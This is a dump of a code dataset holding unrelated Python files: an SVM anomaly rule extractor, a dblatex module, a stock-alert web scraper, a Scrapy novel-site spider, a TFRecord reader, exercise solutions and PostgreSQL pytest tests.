port)\n","sub_path":"lib/controllers/keylogger_controller.py","file_name":"keylogger_controller.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"528325787","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 10 18:41:43 2018\n\n@author: Alberto Barbado González\n\"\"\"\n\n# Libraries\nimport numpy as np\nimport pandas as pd\nfrom sklearn import svm\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.cluster import KMeans\n\n\ndef obtain_centroid(X_train, sc, n_clusters):\n \"\"\"\n Function to obtain the centroid of a group of data points. 
It uses the K-Means algorithm, so\n it expects the (scaled) numerical features; categorical (non ordinal) columns are handled separately by the callers.\n \n It returns the assigned cluster labels for each datapoint as well as the cluster centroids, transformed back to the original scale.\n \n \"\"\"\n kmeans = KMeans(n_clusters = n_clusters, init= 'k-means++', \n max_iter = 300, n_init = 10, random_state = 0)\n \n labels = kmeans.fit_predict(X_train)\n centroid = kmeans.cluster_centers_\n centroid = sc.inverse_transform(centroid)\n \n return pd.DataFrame({'labels':labels}), pd.DataFrame(centroid)\n\n\ndef obtain_vertices(df_anomalies_no_sub, X_train, sc, n_vertex, numerical_cols, n_clusters):\n \"\"\"\n Function to obtain the vertices from the hypercube of data points contained\n in a dataframe\n \n \"\"\"\n # Drop duplicate rows\n df_anomalies_no_sub = df_anomalies_no_sub.copy().drop_duplicates()\n rule_subgroups = {}\n\n # Obtain centroid to calculate the vertices in case there are enough points\n df_train = pd.DataFrame()\n for col,j in zip(numerical_cols, range(X_train.shape[1])):\n df_train[col] = X_train[:,j]\n \n df_train_no = df_train.copy().loc[list(df_anomalies_no_sub.index)].reset_index(drop=True)\n df_anomalies_no_sub = df_anomalies_no_sub.reset_index(drop=True)\n\n # Obtain centroid for that sub-hypercube\n n = n_clusters\n labels, centroid_no = obtain_centroid(df_train_no, sc, n)\n df_anomalies_no_sub['cluster_label'] = labels\n \n for i in range(n):\n df_no = df_anomalies_no_sub[df_anomalies_no_sub['cluster_label']==i].copy().drop(['cluster_label'],axis=1).reset_index(drop=True)\n # Need more datapoints in this cluster than the number of requested vertices\n if len(df_no) > n_vertex:\n \n # Obtain vertices\n # Euclidean distance of each datapoint to centroid\n df_no['distances'] = np.linalg.norm(df_no[numerical_cols].sub(np.array(centroid_no.loc[i].values.squeeze())), axis=1)\n df_no = df_no.sort_values(by=['distances'], ascending=True)\n \n list_index = list(df_no.head(int(n_vertex/2)).append(df_no.tail(int(n_vertex/2))).index)\n vectors_bound = df_no[df_no.index.isin(list_index)]\n \n centroid = centroid_no.loc[i].values.squeeze()\n\n # In case there is less data in the sub-hypercube than the number of required vertices, all points are selected;\n # no need to obtain the centroid\n else:\n print(\"Datapoints = {0} | Few data points in this iteration; using all of them as rules.\".format(len(df_no)))\n vectors_bound = df_no.copy()\n centroid = None\n vectors_bound['distances'] = None\n \n rule_subgroups[i] = [vectors_bound, centroid]\n \n return rule_subgroups\n\n\ndef obtain_limits(df):\n \"\"\"\n Obtain the per-feature limits (min and max) of the datapoints in df,\n returned as a single row with one '_max' and one '_min' column per feature.\n \"\"\"\n \n # Obtain limits\n vectors_bound_all = df.copy()\n vectors_bound_all.drop([\"distances\"], axis=1, inplace=True)\n df_bounds_max = vectors_bound_all.max().reset_index().rename(columns={'index':'cat'}).transpose() # df with the max variable values on the hyperplanes\n df_bounds_max.columns = df_bounds_max.loc['cat']\n df_bounds_max = df_bounds_max.reindex(df_bounds_max.index.drop('cat'))\n aux = [col + '_max' for col in df_bounds_max.columns]\n df_bounds_max.columns = aux\n \n df_bounds_min = vectors_bound_all.min().reset_index().rename(columns={'index':'cat'}).transpose() # df with the min variable values on the hyperplanes\n df_bounds_min.columns = df_bounds_min.loc['cat']\n df_bounds_min = df_bounds_min.reindex(df_bounds_min.index.drop('cat'))\n aux = [col + '_min' for col in df_bounds_min.columns]\n df_bounds_min.columns = aux\n \n df_bounds = df_bounds_max.join(df_bounds_min, how='inner')\n \n return 
df_bounds\n\n\ndef function_check(x,limits,numerical_cols):\n \"\"\"\n True: outside hypercube\n False: not outside hypercube\n \"\"\"\n \n result = False\n for col in numerical_cols:\n l_max = limits[col+'_max'][0]\n l_min = limits[col+'_min'][0]\n \n # If its outside from some of the limits, then its outside the hypercube\n if (x[col] > l_max) or (x[col] < l_min):\n result = True\n \n return result\n\ndef obtain_rules(df_anomalies_no, df_anomalies_yes, X_train, sc, n_vertex_numerical, numerical_cols):\n \"\"\"\n # TODO\n \n \"\"\"\n \n # Obtain vertices\n n = 0\n check = True\n \n # Drop duplicates\n df_anomalies_no.drop_duplicates(inplace=True)\n df_anomalies_yes.drop_duplicates(inplace=True)\n \n while check:\n n += 1\n # Rules\n df_bounds = []\n \n print(\"Iteration {0} | nº clusters used {0}\".format(n))\n dict_vectors_bound_all = obtain_vertices(df_anomalies_no, X_train, sc, n_vertex_numerical, numerical_cols, n_clusters=n)\n \n for key, value in dict_vectors_bound_all.items():\n vectors_bound_all = value[0].copy()\n \n ### Check if cluster is empty - if it's empty, ignore it\n if vectors_bound_all.empty:\n check = False\n continue\n \n #centroid = value[1]\n \n ### Check if a datapoint anomalous would be inside the not anomalous hypercube\n \n # Case where all the points are used as vertices\n if vectors_bound_all['distances'].iloc[0] == None:\n check = False\n df_bounds.append(obtain_limits(vectors_bound_all))\n \n # Case where only some points are used as vertices\n else:\n limits = obtain_limits(vectors_bound_all)\n df_bounds.append(limits)\n \n df_anomalies_yes[\"outside_hcube\"] = df_anomalies_yes.apply(lambda x:function_check(x,limits,numerical_cols), axis=1)\n list_check = list(df_anomalies_yes[\"outside_hcube\"].unique())\n \n # If at least one anomalous point is inside the hypercube, repeat again for ALL points with one more cluster\n if False in list_check:\n check = True\n break # Return to 'while' loop\n else:\n check = False\n \n \n return df_bounds\n\n\ndef print_rules(df_bounds, categorical_cols):\n \"\"\"\n # TODO\n \n \"\"\"\n \n number = 0\n list_rules = []\n \n for i, row in df_bounds.iterrows():\n number += 1\n s = 'Rule Nº {number}: IF '.format(number=number)\n for col, value in zip(row.index, row.values):\n if col in categorical_cols:\n s += '{col} = {value} AND '.format(col=col, value=value)\n elif col[-4:]=='_max':\n s += '{col} <= {value} AND '.format(col=col, value=value)\n else:\n s += '{col} >= {value} AND '.format(col=col, value=value)\n \n s = s[:-4] # delete last AND\n s = s.replace('_max', '').replace('_min', '')\n print(s) \n list_rules.append(s)\n \n \n return list_rules\n \n\n\ndef ocsvm_rule_extractor(dataset_mat, y_labels, numerical_cols, categorical_cols, dct_params):\n \n \"\"\"\n Function to extract rules that justify in a comprehensive way why some data points\n are identified as outliers. The function returns a dataframe with the boundaries that\n define those rules according to the different features used as well as the model trained.\n \n \"\"\"\n \n # Check data quantity\n n_vertex = 2**(len(numerical_cols) + len(categorical_cols))\n n_vertex_numerical = 2**len(numerical_cols)\n \n # Check that there's enough data points to obtain the vertex of the hypercube\n if n_vertex > len(dataset_mat):\n raise ValueError(\"ERROR! 
Insufficient data points\") \n \n # Scaling numerical data\n sc = StandardScaler()\n \n if len(numerical_cols):\n X_train = dataset_mat[numerical_cols]\n X_train = sc.fit_transform(X_train)\n else:\n X_train = dataset_mat\n \n X_train_model = X_train\n \n for col in categorical_cols:\n X_train_model = np.insert(X_train_model, np.shape(X_train_model)[1], dataset_mat[col].values, axis=1)\n \n # Train OneClassSVM\n model = svm.SVC(gamma='scale')\n model.fit(X_train_model, y_labels)\n \n preds = pd.DataFrame({\"predictions\":list(model.predict(X_train_model))}) \n preds[\"distances\"] = model.decision_function(X_train_model)\n df_anomalies = pd.merge(dataset_mat, preds, left_index=True, right_index=True)\n \n df_anomalies_no = df_anomalies[df_anomalies['predictions']==1].sort_values(by=\"distances\", ascending=True).drop(['predictions', 'distances'], axis=1)\n df_anomalies_yes = df_anomalies[df_anomalies['predictions']==-1].sort_values(by=\"distances\", ascending=True).drop(['predictions', 'distances'], axis=1)\n \n \n # Case 1: Only numerical variables\n if len(categorical_cols) == 0:\n \n # Obtain rules\n df_bounds = obtain_rules(df_anomalies_no, df_anomalies_yes, X_train, sc, n_vertex_numerical, numerical_cols)\n \n # Extract rules\n list_rules_total = []\n print(\"NOT anomaly...\")\n j = 0\n for df in df_bounds:\n j += 1\n print(\"----- Subgroup {0} ------\".format(j))\n list_rules = print_rules(df, categorical_cols)\n list_rules_total.append(list_rules)\n print(\"\")\n \n \n # Case 2: Only categorical variables\n elif len(numerical_cols) == 0:\n df_bounds = df_anomalies_no[categorical_cols].drop_duplicates().reset_index(drop=True)\n \n # Extract rules\n print(\"NOT anomaly...\")\n list_rules = print_rules(df_bounds, categorical_cols)\n \n # Case 3: Numerical + Categorical\n else:\n df_cat = df_anomalies_no[categorical_cols]\n df_cat_unique = df_cat.drop_duplicates()\n df_cat_yes = df_anomalies_yes[categorical_cols]\n df_bounds_all = []\n \n j=0\n for i, row in df_cat_unique.iterrows():\n j += 1\n print(\"Category {0}\".format(j))\n \n # Obtain sub-hypercube (not outliers)\n list_index = df_cat[df_cat[row.index]==row.values].dropna().index # index for that sub-hypercube\n df_anomalies_no_sub = df_anomalies_no[(df_anomalies_no.index.isin(list_index))].copy() # sub-hypercube\n \n # Outliers for this iteration\n list_index_yes = df_cat_yes[df_cat_yes[row.index]==row.values].dropna().index\n df_anomalies_yes_sub = df_anomalies_yes[(df_anomalies_yes.index.isin(list_index_yes))].copy() # outliers for this iteration\n \n # Obtain vertices for this iteration\n df_bounds = obtain_rules(df_anomalies_no_sub[numerical_cols].copy(), df_anomalies_yes_sub[numerical_cols].copy(), X_train, sc, n_vertex_numerical, numerical_cols)\n\n for col in categorical_cols:\n for df in df_bounds:\n df[col] = row[col]\n \n df_bounds_all.append(df_bounds)\n print(\"\")\n \n df_bounds = df_bounds_all\n \n # Extract rules\n i = 0\n list_rules_total = []\n print(\"NOT anomaly...\")\n for rules_cat in df_bounds:\n i += 1\n print(\"*\"*75)\n print(\"Combination of categorical variables Nº {0} \".format(i))\n j = 0\n for df in rules_cat:\n j += 1\n print(\"----- Subgroup {0} ------\".format(j))\n list_rules = print_rules(df, categorical_cols)\n list_rules_total.append(list_rules)\n print(\"\")\n print(\"*\"*75)\n \n return model, df_bounds, 
df_anomalies\n","sub_path":"lib/supervised_rules.py","file_name":"supervised_rules.py","file_ext":"py","file_size_in_byte":12295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"651041590","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/dbtexmf/core/sgmlxml.py\n# Compiled at: 2017-04-03 18:58:57\nimport os, sys, re, logging\nfrom subprocess import call\n\nclass Osx:\n\n def __init__(self):\n self.opts = [\n '-xlower',\n '-xno-nl-in-tag',\n '-xempty',\n '-xno-expand-internal',\n '-xid']\n self.log = logging.getLogger('dblatex')\n\n def replace_entities(self, entfile, mapfile, outfile=None):\n re_ent = re.compile('')\n f = open(entfile)\n lines = f.readlines()\n f.close()\n if not lines:\n return\n ents = []\n for line in lines:\n ents += re_ent.findall(line)\n\n self.log.debug('Entities to map: %s' % ents)\n entpat = '^(%s)\\\\s+[^\\\\s]+\\\\s+0(x[^\\\\s]+)' % ('|').join([ x for x, y in ents ])\n re_map = re.compile(entpat)\n entmap = []\n f = open(mapfile)\n for line in f:\n entmap += re_map.findall(line.split('#')[0])\n\n f.close()\n self.log.debug('Entity map: %s' % entmap)\n entdict = {}\n for ent, uval in entmap:\n entdict[ent] = (\n re.compile('' % ent),\n '' % (ent, uval))\n\n nlines = []\n for line in lines:\n mapped = []\n for ent in entdict:\n reg, rep = entdict[ent]\n line, n = reg.subn(rep, line)\n if n:\n mapped.append(ent)\n\n nlines.append(line)\n for ent in mapped:\n del entdict[ent]\n\n if not outfile:\n outfile = entfile\n f = open(outfile, 'w')\n f.writelines(nlines)\n f.close()\n\n def run(self, sgmlfile, xmlfile):\n errfile = 'errors.osx'\n f = open(xmlfile, 'w')\n rc = call(['osx'] + self.opts + ['-f', errfile, sgmlfile], stdout=f)\n f.close()\n if rc != 0:\n i = 0\n f = open(errfile)\n for line in f:\n sys.stderr.write(line)\n i += 1\n if i == 10:\n break\n\n f.close()\n raise OSError('osx failed')\n sgmlmap = os.path.join(os.path.dirname(__file__), 'sgmlent.txt')\n self.replace_entities('intEntities.dtf', sgmlmap)","sub_path":"pycfiles/dblatex-0.3.10-py2.7/sgmlxml.py","file_name":"sgmlxml.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"234255579","text":"# R-4.7 Describe a recursive function for converting a\n# string of digits into the integer it represents.\n# For example, 13531 represents the integer 13,531.\n\n\ndef str_to_int(s):\n\n if len(s) == 1:\n return int(s[0])\n\n elif len(s) > 1:\n # Peel off the last digit; the remaining prefix contributes ten times its value.\n return str_to_int(s[:-1]) * 10 + int(s[-1])\n\nif __name__ == '__main__':\n a = str_to_int('122')\n print(a)\n print(type(a))\n","sub_path":"Chapter4_Recursion/str_to_int.py","file_name":"str_to_int.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"36239485","text":"import requests\nimport lxml.html as lh\nimport pandas as pd\nimport time\nimport numpy as np\nimport urllib.request\nimport json\nfrom selenium import webdriver\nimport datetime\nimport os\nimport pytz\n\ntz = pytz.timezone('Asia/Kolkata')\n\n\nurl = 'https://www.moneycontrol.com/markets/indian-indices/top-nse-500-companies-list/7?classic=true'\ncount = 0\nglobal prev\nprev = [0 for i in range(500)]\nglobal old\nold = [0 for i in range(500)]\n\npath1 = os.getcwd()\npath = path1 + '/chromedriver'\n\n\noptions = 
webdriver.ChromeOptions()\noptions.add_argument('--no-sandbox')\noptions.add_argument('--disable-dev-shm-usage')\noptions.add_argument('--headless')\noptions.add_experimental_option('excludeSwitches', ['enable-logging'])\n#options.add_argument(f'user-agent={userAgent}')\ndriver = webdriver.Chrome(executable_path=path , options=options)\n\n\n\n\n# Alert Function, It is called every 30 seconds.\n\ndef change(present):\n\n time_now = datetime.datetime.now(tz).time()\n data = pd.read_csv('alert.csv')\n data1 = data.copy()\n\n if(time_now= 1.0) & (data['LTP'] > 10.00)]\n data1 = data1[(data1['%Change'] <= -1.0) & (data1['LTP'] > 10.00)]\n\n else: \n percent = [x - y for x, y in zip(present, prev) ]\n #print(percent)\n data = pd.read_csv('alert.csv')\n data1 = data.copy()\n\n #data['Company'] = df['Company']\n #data['LTP'] = list(map(float,list(data['LTP'].apply(lambda x: x.replace(',','')))))\n data['%Change'] = percent\n data['Previous Value'] = prev\n data['Present Value'] = present\n #data['Volume'] = df['Volume']\n\n #data1['Company'] = df['Company']\n #data1['LTP'] = list(map(float,list(data1['LTP'].apply(lambda x: x.replace(',','')))))\n data1['%Change'] = percent\n data1['Previous Value'] = prev\n data1['Present Value'] = present\n #data1['Volume'] = df['Volume']\n\n data = data[(data['%Change'] >= 1.0) & (data['Volume'] > 100000) & (data['LTP'] > 10.00)]\n data1 = data1[(data1['%Change'] <= -1.0) & (data1['Volume'] > 100000) & (data1['LTP'] > 10.00)]\n\n data.sort_values(\"%Change\", axis = 0, ascending = True, inplace = True, na_position ='last')\n data1.sort_values(\"%Change\", axis = 0, ascending = True, inplace = True, na_position ='last') \n \n return data,data1\n\n#This function returns the table of the given url\n\ndef Real(url,count):\n\n if count == 0:\n \n driver.get(url)\n\n else:\n driver.refresh()\n time.sleep(3)\n\n infile = driver.page_source\n doc = lh.fromstring(infile)\n tr_elements = doc.xpath('//tr')\n tr_elements = tr_elements[1:502]\n\n\n #print([len(T) for T in tr_elements[:]])\n col=[]\n i=0#For each row, store each first element (header) and an empty list\n for t in tr_elements[0]:\n i+=1\n name=t.text_content().strip()\n #print('%d:\"%s\"'%(i,name))\n col.append((name,[]))\n\n\n for j in range(1,len(tr_elements)):\n #T is our j'th row\n T=tr_elements[j]\n \n #If row is not of size 500, the //tr data is not from our table \n if len(T)!=8:\n break\n \n #i is the index of our column\n i=0\n \n #Iterate through each element of the row\n for t in T.iterchildren():\n data=t.text_content() \n #Check if row is empty\n if i>0:\n #Convert any numerical value to integers\n try:\n data=int(data)\n except:\n pass\n #Append the data to the empty list of the i'th column\n col[i][1].append(data)\n #Increment i for the next column\n i+=1\n\n #print([len(C) for (title,C) in col])\n Dict={title:column for (title,column) in col}\n df=pd.DataFrame(Dict)\n df['LTP'] = df['LTP'].apply(lambda x: x.replace(',',''))\n df['LTP'] = df['LTP'].apply(lambda x: pd.to_numeric(x,errors='coerce'))\n df['Volume'] = df['Volume'].apply(lambda x: pd.to_numeric(x,errors='coerce'))\n df = df.drop(['Buy Price', 'Sell Price', 'Buy Qty', 'Sell Qty'],axis= 1)\n df.dropna(inplace=True)\n return df\n\ntime_now = datetime.datetime.now(tz).time()\nwhile(datetime.time(9, 14, tzinfo=tz) < time_now < datetime.time(16, 1, tzinfo=tz)):\n\n try:\n df = Real(url,count)\n df.to_csv('alert.csv',index=False)\n \n count+=1\n\n if(count !=1): #1st loop is ignored\n Result,Result1 = 
change(list(map(float,list(df['%Change']))))\n\n if(not Result.empty and count !=1):\n #print('#'*50)\n print(\"Alert! Increased\")\n #print(' ')\n print(Result)\n #print('#'*50)\n #print(' ')\n Result.to_json('Increase_alert.json', orient='records')\n\n\n if(not Result1.empty and count !=1):\n #print('#'*50)\n print(\"Alert! Decreasing\")\n #print(' ')\n print(Result1)\n #print('#'*50)\n #print(' ')\n Result1.to_json('Decrease_alert.json', orient='records')\n \n if(Result.empty and count !=1):\n a= [{}]\n with open('Increase_alert.json', 'w') as json_file:\n json.dump(a, json_file)\n \n if(Result1.empty and count !=1):\n a= [{}]\n with open('Decrease_alert.json', 'w') as json_file:\n json.dump(a, json_file)\n\n \n time_now = datetime.datetime.now(tz).time()\n\n \n\n\n\n prev = df['%Change']\n #By default the values are turned into str, so to convert to float we use the below statement\n prev = list(map(float,list(prev)))\n #print(prev)\n\n #Count Down for 60 seconds\n t = 60\n while t>=0:\n mins,secs = (00,t)\n timer = '{:02d}:{:02d}'.format(mins,secs)\n #print(timer)\n time.sleep(1)\n t -= 1\n \n time_now = datetime.datetime.now(tz).time()\n\n except KeyboardInterrupt:\n break\n\nif(time_now >= datetime.time(16, 1, tzinfo=tz)):\n print('Market Closed')\n a= [{}]\n with open('Increase_alert.json', 'w') as json_file:\n json.dump(a, json_file)\n\n with open('Decrease_alert.json', 'w') as json_file:\n json.dump(a, json_file)\n#Press stop button to stop the loop\n#Look at try.csv for nifty500 data \n","sub_path":"NLP_api/Real_time_alert.py","file_name":"Real_time_alert.py","file_ext":"py","file_size_in_byte":6938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"205936276","text":"# Permuted multiples\nfrom time import time\n\nstart = time()\n\n\ndef pf(num): # comparison preparation function\n # return set(str(num)) # it's a little faster but not an exact solution\n return ''.join(sorted(str(num)))\n\n\ndef e52():\n smax = '16666'\n while True:\n smax += '6'\n for n in range(10 ** (len(smax) - 1) + 2, int(smax), 3): # n must be divisible by 3\n if pf(n) == pf(n * 2) == pf(n * 3) == pf(n * 4) == pf(n * 5) == pf(n * 6):\n return n\n\n\nprint('Answer =', e52()) # 142857\nprint('Runtime =', time() - start)\n","sub_path":"euler52_Permuted_multiples.py","file_name":"euler52_Permuted_multiples.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"493743479","text":"import scrapy, re\nfrom test001.items import BookItem\nimport include_book_walker\n\nclass qiushubang(include_book_walker.CBookWalker):\n\tname = \"qiushubang\"\n\tallowed_domains = [\"qiushubang.com\"]\n\tstart_urls = 
[\n\t\t\"https://www.qiushubang.com/124800/\",\n\t\t\"https://www.qiushubang.com/141780/\",\n\t\t\"https://www.qiushubang.com/135013/\",\n\t\t\"https://www.qiushubang.com/140562/\",\n\t\t\"https://www.qiushubang.com/135345/\",\n\t\t\"https://www.qiushubang.com/135206/\",\n\t\t\"https://www.qiushubang.com/164344/\",\n\t\t\"https://www.qiushubang.com/137718/\",\n\t\t\"https://www.qiushubang.com/135038/\",\n\t\t\"https://www.qiushubang.com/135127/\",\n\t\t\"https://www.qiushubang.com/135212/\",\n\t\t\"https://www.qiushubang.com/135456/\",\n\t\t\"https://www.qiushubang.com/133604/\",\n\t\t\"https://www.qiushubang.com/142124/\",\n\t\t\"https://www.qiushubang.com/135455/\",\n\t\t\"https://www.qiushubang.com/135238/\",\n\t\t\"https://www.qiushubang.com/135568/\",\n\t\t\"https://www.qiushubang.com/5721/\",\n\t\t\"https://www.qiushubang.com/141895/\",\n\t\t\"https://www.qiushubang.com/134991/\",\n\t\t\"https://www.qiushubang.com/135141/\",\n\t\t\"https://www.qiushubang.com/163429/\",\n\t\t\"https://www.qiushubang.com/31377/\",\n\t\t\"https://www.qiushubang.com/135004/\",\n\t\t\"https://www.qiushubang.com/140416/\",\n\t]\n\t\n\tcustom_settings = {\n\t\t\"DEPTH_PRIORITY\" : -1,\n\t\t\"RETRY_TIMES\" : 9,\n\t\t\"DOWNLOAD_DELAY\" : 3,\n\t\t\"COOKIES_ENABLES\" : False,\n\t\t\"COOKIES_ENABLED\" : False,\n\t\t\n\t\t# 这网站打开超慢\n\t\t\"DOWNLOAD_TIMEOUT\" : 60,\n\t}\n\t\n\t# 代理,这网站速度巨慢\n\t# proxy = \"http://127.0.0.1:7135\"\n\t\n\tbase_same_title = 1\n\tcached_chapters = {}\n\t\n\tdef parse(self, response):\n\t\tcur_header = self.header.copy()\n\t\tcur_header[\"Referrer\"] = response.url\n\t\tprint(\"当前页面:{}\".format(response.url))\n\t\t\n\t\tif not response.xpath(r\"//div[@class='detail']\"):\n\t\t\tprint(\"错误:这个页面 {} 不是书本信息。\".format(response.url))\n\t\t\treturn None\n\t\t\n\t\titem = BookItem()\n\t\titem[\"book_title\"] = response.xpath(r\"//meta[@property='og:title']/@content\").extract_first()\n\t\titem[\"book_author\"] = response.xpath(r\"//meta[@property='og:novel:author']/@content\").extract_first()\n\t\titem[\"book_description\"] = response.xpath(r\"//meta[@property='og:description']/@content\").extract_first()\n\t\titem[\"book_type\"] = response.xpath(r\"//meta[@property='og:novel:category']/@content\").extract_first()\n\t\titem[\"book_cover\"] = response.xpath(r\"//meta[@property='og:image']/@content\").extract_first()\n\t\titem[\"book_finish\"] = response.xpath(r\"//meta[@property='og:novel:status']/@content\").extract_first()\n\t\titem[\"book_lastupdate\"] = response.xpath(r\"//meta[@property='og:novel:update_time']/@content\").extract_first()\n\t\t\n\t\tunique = self.proccess_book_info(item, response.url)\n\t\tchapterList = list(reversed(response.xpath(r\"//div[@class='chapterCon']/ul/li/a/@href\").extract()))\n\t\tchapterTitle = list(reversed(response.xpath(r\"//div[@class='chapterCon']/ul/li/a/text()\").extract()))\n\t\t\n\t\t# www 开头的太慢了,而且还有章节内容塞图片的操作,换成手机版的吧\n\t\turl_base = response.url.replace(\"//www.\", \"//wap.\").replace(\"//m.\", \"//wap.\")\n\t\tfor i in range(len(chapterList)):\n\t\t\tchapterList[i] = self.fix_url(chapterList[i], url_base)\n\t\tcur_header[\"Referrer\"] = cur_header[\"Referrer\"].replace(\"/www.\", \"/wap.\")\n\t\tcur_header[\"User-Agent\"] = \"NOKIA5700/ UCWEB7.0.2.37/28/999\"\n\t\t\n\t\t# chapterList = [x for x in chapterList if x.find(\".html\") > -1]\n\t\treturn self.proccess_chapter_list(unique, chapterList, self.parse_chapter, response.url, chapterTitle)\n\t#end - parse\n\t\n\tdef parse_chapter(self, response):\n\t\theader = 
self.header.copy()\n\t\theader[\"Referrer\"] = response.url\n\t\t\n\t\tif not response.xpath(r\"//div[@class='readerCon']\") and not response.xpath(r\"//div[@class='nr_title']\"):\n\t\t\tprint(\"Error: page {} is not a book chapter.\".format(response.url))\n\t\t\treturn None\n\t\t\n\t\tchapterTitle = response.xpath(r\"//div[@class='articleTitle']/h2/text()\").extract_first() or response.xpath(r\"//div[@id='nr_title']/text()\").extract_first()\n\t\tchapterContext = \"\\n\".join(response.xpath(r\"//div[@class='articleCon']/p/text()\").extract() or response.xpath(r\"//div[@id='nr1']/text()\").extract())\n\t\t\n\t\t# strip junk content\n\t\tchapterTitle = re.sub(r\"\\(\\d+/\\d+\\)$\", \"\", chapterTitle.strip())\n\t\tchapterContext = chapterContext.replace(\"【重要提醒】使用百度APP看小说的,切记要取消畅读模式,否则求书帮上的最新小说章节会只显示一半\", \"\")\n\t\t\n\t\t# handle pagination\n\t\tunique = re.search(r\"(/\\d+/\\d+)[_\\.]\", response.url).group(1)\n\t\tnp = response.xpath(\"//a[text()='下一页']/@href\").extract_first()\n\t\tif np:\n\t\t\tif unique not in self.cached_chapters:\n\t\t\t\tself.cached_chapters[unique] = chapterContext\n\t\t\telse:\n\t\t\t\tself.cached_chapters[unique] += chapterContext\n\t\t\t#end if\n\t\t\t\n\t\t\tnp = self.fix_url(np, response.url)\n\t\t\tif np != response.url:\n\t\t\t\treturn scrapy.Request(\n\t\t\t\t\tnp,\n\t\t\t\t\tcallback = self.parse_chapter,\n\t\t\t\t\theaders = header,\n\t\t\t\t\tmeta = response.meta,\n\t\t\t\t\tpriority = 10\n\t\t\t\t)\n\t\t\telse:\n\t\t\t\tself.logger.error(\"Pagination limit exceeded: \" + np)\n\t\t#end if\n\t\t\n\t\tif unique in self.cached_chapters:\n\t\t\tchapterContext = self.cached_chapters[unique] + chapterContext\n\t\t\tdel self.cached_chapters[unique]\n\t\t#end if\n\t\t\n\t\timage = response.xpath(r\"//div[@class='articleCon']/p/img/@src\").extract_first()\n\t\tif image:\n\t\t\tself.logger.warning(\"{} needs image recognition\".format(response.url))\n\t\t\n\t\treturn self.proccess_chapter(chapterTitle, chapterContext, response.meta, self.remove_page_mark(response.url))\n\t#end - parse_chapter\n#end - qiushubang\n","sub_path":"test001/spiders/qiushubang.py","file_name":"qiushubang.py","file_ext":"py","file_size_in_byte":5447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"375539761","text":"import tensorflow as tf\nimport pdb\n\nreader = tf.TFRecordReader()\nfilename = \"train--.tfrecord\"\nfilename_queue = tf.train.string_input_producer([filename], num_epochs = 1)\n_, serialized_example = reader.read(filename_queue)\n\ncontexts, features = tf.parse_single_sequence_example(\n\tserialized_example,\n\tcontext_features={\n\t\t'video_id': tf.FixedLenFeature([], tf.string),\n\t\t'labels': tf.VarLenFeature(tf.int64)\n\t},\n\tsequence_features = {\n\t\tfeature_name: tf.FixedLenSequenceFeature([], dtype = tf.string)\n\t\tfor feature_name in ['rgb', 'audio']\n\t})\nfeatures['rgb'] = tf.reshape(tf.cast(tf.decode_raw(features['rgb'], tf.uint8), tf.float32), [-1, 1024])\nfeatures['audio'] = tf.reshape(tf.cast(tf.decode_raw(features['audio'], tf.uint8), tf.float32), [-1, 128])\nsess = tf.Session()\ninit = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer()) \nsess.run(init)\ntf.train.start_queue_runners(sess=sess)\ni = 0\nwhile i > -1:\n\t# dict.values() is not a list in Python 3, so wrap it before concatenating\n\t[features_1, features_2, labels] = sess.run(list(features.values()) + [contexts['labels']])\n\ti += 1\n\tprint(i, 
labels)\n\tprint(features_1.shape)\n","sub_path":"Utils/dataPrepare.py","file_name":"dataPrepare.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"586780103","text":"import tempfile\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom pytest_postgresql import factories\nfrom models import Base, ParsedText  # assumes models also exports the declarative Base used in setup_database\nimport pytest\n\n\nsocket_dir = tempfile.TemporaryDirectory()\npostgresql_my_proc = factories.postgresql_proc(port=None, unixsocketdir=socket_dir.name)\npostgresql_my = factories.postgresql(\"postgresql_my_proc\")\n\n\n@pytest.fixture(scope=\"function\")\ndef setup_database(postgresql_my):\n    def dbcreator():\n        return postgresql_my.cursor().connection\n\n    engine = create_engine(\"postgresql+psycopg2://\", creator=dbcreator)\n    Base.metadata.create_all(engine)\n    Session = sessionmaker(bind=engine)\n    session = Session()\n    yield session\n    session.close()\n\n\ndef test_postgres_options(postgresql):\n    \"\"\"Ensure max connections exists\"\"\"\n    cur = postgresql.cursor()\n    cur.execute(\"SHOW max_connections\")\n    assert cur.fetchone() == (\"100\",)\n\n\ndef test_db_creation(postgresql):\n    \"\"\"Test if you can create a postgres db\"\"\"\n    cur = postgresql.cursor()\n    cur.execute(\"CREATE TABLE test (id serial PRIMARY KEY, num integer, data varchar);\")\n    postgresql.commit()\n    cur.close()\n\n\ndef test_orm():\n    \"\"\"Tests creation and query of an item in ParsedText -- doing it live due to lack of time\"\"\"\n    test_json = {\"text\": 101}\n    instance = ParsedText.ParsedText(\n        url=\"https://google.com\",\n        big_text=\"some lengthy test text\",\n        text_analysis=test_json,\n    )\n    instance.save()\n    saved_item = ParsedText.ParsedText.query.first()\n    assert saved_item.url == \"https://google.com\"","sub_path":"server/test_server.py","file_name":"test_server.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
